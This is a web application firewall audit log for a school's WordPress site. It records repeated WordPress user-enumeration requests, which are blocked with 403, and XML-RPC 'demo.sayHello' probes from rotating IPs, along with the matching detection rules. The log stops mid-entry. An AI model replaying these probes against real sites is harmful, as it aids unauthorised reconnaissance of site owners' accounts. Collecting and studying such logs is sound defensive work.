Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497032391714 5481 (- - -) Stopwatch2: 1747497032391714 5481; combined=4324, p1=546, p2=3540, p3=36, p4=35, p5=98, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0942261a-Z-- --aedf580c-A-- [17/May/2025:22:51:54 +0700] aCiwmgTOsBn9MSWb6WLR5wAAAIM 103.236.140.4 43234 103.236.140.4 8181 --aedf580c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aedf580c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aedf580c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497114182000 3005 (- - -) Stopwatch2: 1747497114182000 3005; combined=1376, p1=460, p2=874, p3=0, p4=0, p5=42, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aedf580c-Z-- --ff8c6163-A-- [17/May/2025:22:52:02 +0700] aCiwogTOsBn9MSWb6WLR7AAAAJQ 103.236.140.4 43250 103.236.140.4 8181 --ff8c6163-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.148 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ff8c6163-C-- demo.sayHello --ff8c6163-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff8c6163-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497122350796 6304 (- - -) Stopwatch2: 1747497122350796 6304; combined=4638, p1=617, p2=3782, p3=40, p4=43, p5=94, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff8c6163-Z-- --7642a17b-A-- [17/May/2025:22:52:22 +0700] aCiwthKi5m5upc8uMd4YuAAAAMM 103.236.140.4 43426 103.236.140.4 8181 --7642a17b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7642a17b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7642a17b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497142743775 2762 (- - -) Stopwatch2: 1747497142743775 2762; combined=1283, p1=422, p2=824, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7642a17b-Z-- --05fe3412-A-- [17/May/2025:22:52:30 +0700] aCiwvnyxdQCiyU1ENFehyAAAABg 103.236.140.4 43494 103.236.140.4 8181 --05fe3412-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --05fe3412-C-- demo.sayHello --05fe3412-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --05fe3412-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497150055144 5728 (- - -) Stopwatch2: 1747497150055144 5728; combined=4209, p1=532, p2=3453, p3=32, p4=34, p5=93, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05fe3412-Z-- --7e107028-A-- [17/May/2025:22:53:04 +0700] aCiw4HyxdQCiyU1ENFeh-wAAABg 103.236.140.4 43774 103.236.140.4 8181 --7e107028-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7e107028-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e107028-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497184164856 2708 (- - -) Stopwatch2: 1747497184164856 2708; combined=1233, p1=441, p2=763, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e107028-Z-- --ca4e7f16-A-- [17/May/2025:22:53:10 +0700] aCiw5nyxdQCiyU1ENFeiCgAAABE 103.236.140.4 43842 103.236.140.4 8181 --ca4e7f16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.146 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ca4e7f16-C-- demo.sayHello --ca4e7f16-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca4e7f16-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497190843580 5280 (- - -) Stopwatch2: 1747497190843580 5280; combined=4246, p1=508, p2=3512, p3=36, p4=35, p5=92, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca4e7f16-Z-- --4422ad62-A-- [17/May/2025:22:53:17 +0700] aCiw7XyxdQCiyU1ENFeiGQAAAAc 103.236.140.4 43920 103.236.140.4 8181 --4422ad62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4422ad62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4422ad62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497197635827 2065 (- - -) Stopwatch2: 1747497197635827 2065; combined=1101, p1=345, p2=729, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4422ad62-Z-- --f669611c-A-- [17/May/2025:22:53:25 +0700] aCiw9em4kjNN-hEbWjKhpgAAAFU 103.236.140.4 43988 103.236.140.4 8181 --f669611c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f669611c-C-- demo.sayHello --f669611c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f669611c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497205645045 5571 (- - -) Stopwatch2: 1747497205645045 5571; combined=4134, p1=538, p2=3371, p3=34, p4=35, p5=93, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f669611c-Z-- --fe3b7a07-A-- [17/May/2025:22:53:26 +0700] aCiw9nyxdQCiyU1ENFeiLQAAABQ 103.236.140.4 44002 103.236.140.4 8181 --fe3b7a07-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe3b7a07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe3b7a07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497206504298 2963 (- - -) Stopwatch2: 1747497206504298 2963; combined=1438, p1=478, p2=919, p3=0, p4=0, p5=41, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe3b7a07-Z-- --50602d28-A-- [17/May/2025:22:53:34 +0700] aCiw_nyxdQCiyU1ENFeiPwAAAAI 103.236.140.4 44110 103.236.140.4 8181 --50602d28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.219 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50602d28-C-- demo.sayHello --50602d28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50602d28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497214943626 5710 (- - -) Stopwatch2: 1747497214943626 5710; combined=4206, p1=526, p2=3451, p3=34, p4=34, p5=95, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50602d28-Z-- --da2cea62-A-- [17/May/2025:22:53:54 +0700] aCixEhKi5m5upc8uMd4YywAAAMw 103.236.140.4 44122 103.236.140.4 8181 --da2cea62-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da2cea62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da2cea62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497234706723 2750 (- - -) Stopwatch2: 1747497234706723 2750; combined=1228, p1=444, p2=755, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da2cea62-Z-- --1818a50f-A-- [17/May/2025:22:54:05 +0700] aCixHRKi5m5upc8uMd4YzAAAANg 103.236.140.4 44130 103.236.140.4 8181 --1818a50f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1818a50f-C-- demo.sayHello --1818a50f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1818a50f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497245854278 5069 (- - -) Stopwatch2: 1747497245854278 5069; combined=3671, p1=469, p2=3009, p3=29, p4=31, p5=79, sr=65, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1818a50f-Z-- --7632077d-A-- [17/May/2025:22:54:26 +0700] aCixMnyxdQCiyU1ENFeiUQAAAAo 103.236.140.4 44206 103.236.140.4 8181 --7632077d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7632077d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7632077d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497266738531 2854 (- - -) Stopwatch2: 1747497266738531 2854; combined=1293, p1=429, p2=835, p3=0, p4=0, p5=29, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7632077d-Z-- --3a661937-A-- [17/May/2025:22:54:33 +0700] aCixOQTOsBn9MSWb6WLSAQAAAIc 103.236.140.4 44214 103.236.140.4 8181 --3a661937-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3a661937-C-- demo.sayHello --3a661937-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a661937-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497273750967 5617 (- - -) Stopwatch2: 1747497273750967 5617; combined=4129, p1=591, p2=3377, p3=24, p4=26, p5=66, sr=98, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a661937-Z-- --48c29516-A-- [17/May/2025:22:55:03 +0700] aCixV3yxdQCiyU1ENFeiagAAAAE 103.236.140.4 44394 103.236.140.4 8181 --48c29516-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --48c29516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c29516-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497303989241 2641 (- - -) Stopwatch2: 1747497303989241 2641; combined=1217, p1=411, p2=776, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c29516-Z-- --ac76a028-A-- [17/May/2025:22:55:11 +0700] aCixX3yxdQCiyU1ENFeieAAAAAs 103.236.140.4 44458 103.236.140.4 8181 --ac76a028-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac76a028-C-- demo.sayHello --ac76a028-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac76a028-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497311595491 5401 (- - -) Stopwatch2: 1747497311595491 5401; combined=4283, p1=496, p2=3556, p3=34, p4=35, p5=95, sr=72, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac76a028-Z-- --9e76d113-A-- [17/May/2025:22:55:49 +0700] aCixhQTOsBn9MSWb6WLSrgAAAJI 103.236.140.4 45712 103.236.140.4 8181 --9e76d113-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.224.104.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.224.104.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9e76d113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e76d113-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 